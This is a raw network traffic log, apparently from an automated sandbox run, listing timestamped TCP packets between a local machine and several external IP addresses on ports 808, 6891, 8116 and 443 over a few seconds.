Oct 28, 2021 05:27:26.015053034 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:26.015160084 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:26.018037081 CEST	49895	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:26.064671993 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:26.064687014 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:26.064908981 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:26.072587013 CEST	49894	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:26.150398970 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.175909042 CEST	808	49895	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:26.188961983 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.241597891 CEST	808	49894	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:26.316510916 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.316689968 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.317677021 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.356494904 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.356679916 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.357409954 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.483714104 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.483907938 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.484015942 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.484603882 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.487791061 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.487903118 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.523513079 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.523587942 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.523750067 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.524595976 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.527895927 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.527997017 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:26.653915882 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.653940916 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.694109917 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:26.694236040 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.037746906 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.037771940 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.037866116 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:27.037904978 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:27.040412903 CEST	49896	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:27.086414099 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.086448908 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.086486101 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:27.086529016 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:27.093780041 CEST	49897	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:27.156450033 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.204209089 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.204391003 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.204507113 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.205039978 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.206403971 CEST	6891	49896	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.252806902 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.253185034 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.253274918 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.253819942 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.256946087 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.257056952 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.257297039 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.257456064 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.258047104 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.259680986 CEST	6891	49897	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:27.304845095 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.305169106 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.311003923 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.311162949 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.311954021 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.311978102 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.315099001 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.315186024 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.368382931 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.368410110 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.369116068 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.496326923 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.496347904 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.496439934 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.498745918 CEST	49898	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.546407938 CEST	8116	49898	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.560874939 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.560920954 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.561028957 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.567068100 CEST	49899	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:27.617955923 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:27.618031025 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:27.618170023 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:27.618743896 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:27.618772984 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:27.620121002 CEST	8116	49899	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:27.687216043 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:27.687256098 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:27.687341928 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:27.687827110 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:27.687841892 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.139244080 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.139313936 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.140278101 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.140289068 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.144061089 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.144069910 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.144192934 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.144207001 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.187205076 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.187375069 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.187948942 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.187959909 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.223736048 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.223752975 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.223805904 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.223818064 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.851944923 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.852045059 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.852147102 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.852164984 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.857177019 CEST	49900	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.857203960 CEST	443	49900	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.913296938 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.913379908 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:28.913566113 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.921437979 CEST	49901	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:28.921463013 CEST	443	49901	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:29.037528038 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.068378925 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.209495068 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.209613085 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.213500023 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.230140924 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.230262995 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.232290030 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.383625984 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.383744001 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.383833885 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.388513088 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.391324043 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.391412020 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.393845081 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.393969059 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.394038916 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.394777060 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.397495031 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.397599936 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.556485891 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568909883 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568929911 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568938017 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568950891 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568958998 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568968058 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568979979 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.568989038 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.569000959 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.933815956 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.933860064 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.933917999 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.933948994 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.936216116 CEST	49903	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.945707083 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.945743084 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:29.945806980 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.945826054 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:29.953763008 CEST	49902	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:30.074815989 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.076512098 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.098067045 CEST	808	49903	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:30.125360966 CEST	808	49902	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:30.241014004 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.241261005 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.242575884 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.242696047 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.245625019 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.245696068 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.411515951 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.411546946 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.411560059 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.411678076 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.411709070 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.411789894 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.413947105 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.419011116 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.419145107 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.420933008 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.425281048 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.425415993 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.584969997 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.584995031 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.591442108 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.591465950 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.591478109 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.971735954 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.971764088 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.971853018 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.971894026 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.980714083 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.980742931 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:30.980889082 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:30.992877007 CEST	49905	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:31.002553940 CEST	49904	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:31.128789902 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.144493103 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.159064054 CEST	6891	49905	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:31.168463945 CEST	6891	49904	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:31.179028034 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.179164886 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.181349993 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.204680920 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.204873085 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.209225893 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.231410027 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.231699944 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.231795073 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.235599995 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.239408016 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.239516020 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.269196033 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.269381046 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.269447088 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.272465944 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.276659966 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.276796103 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.289450884 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.289710999 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.336720943 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.337057114 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.376744032 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.461678982 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.461709976 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.461791039 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.461837053 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.475991964 CEST	49906	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.507514954 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.507551908 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.507654905 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.507718086 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.518630028 CEST	49907	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:31.526067972 CEST	8116	49906	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.578718901 CEST	8116	49907	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:31.601898909 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:31.601948977 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:31.602088928 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:31.603015900 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:31.603040934 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:31.651483059 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:31.651551962 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:31.651721001 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:31.652622938 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:31.652659893 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.095904112 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.096081018 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.097189903 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.097217083 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.101583958 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.101607084 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.101675987 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.101687908 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.140834093 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.141048908 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.141793013 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.141819000 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.146442890 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.146461964 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.146554947 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.146564960 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.800643921 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.800710917 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.800791025 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.800869942 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.809288979 CEST	49909	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.809315920 CEST	443	49909	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.835325956 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.835433960 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.835458994 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.835536003 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.839615107 CEST	49910	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:32.839651108 CEST	443	49910	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:32.922629118 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:32.968878984 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.083980083 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.084635973 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.085597038 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.131130934 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.131319046 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.132164955 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.245553017 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.245580912 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.245738029 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.246623039 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.258477926 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.258559942 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.292139053 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.292335033 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.293459892 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.294761896 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.297535896 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.297671080 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.406939030 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.418649912 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.418704987 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.418747902 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.418782949 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.454737902 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.457525015 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.457570076 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.457600117 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.457624912 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.808366060 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.808383942 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.808463097 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.808510065 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.814573050 CEST	49915	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.845457077 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.845482111 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.845550060 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.845601082 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.849973917 CEST	49916	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:33.922924995 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:33.974709988 CEST	808	49915	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:33.975480080 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.010133982 CEST	808	49916	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:34.089632034 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.089778900 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.091063976 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.141433001 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.141567945 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.142195940 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.256973028 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.257102013 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.257174015 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.260426044 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.263530970 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.263642073 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.308222055 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.308304071 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.308370113 CEST	49921	6891	192.168.2.3	45.77.0.96
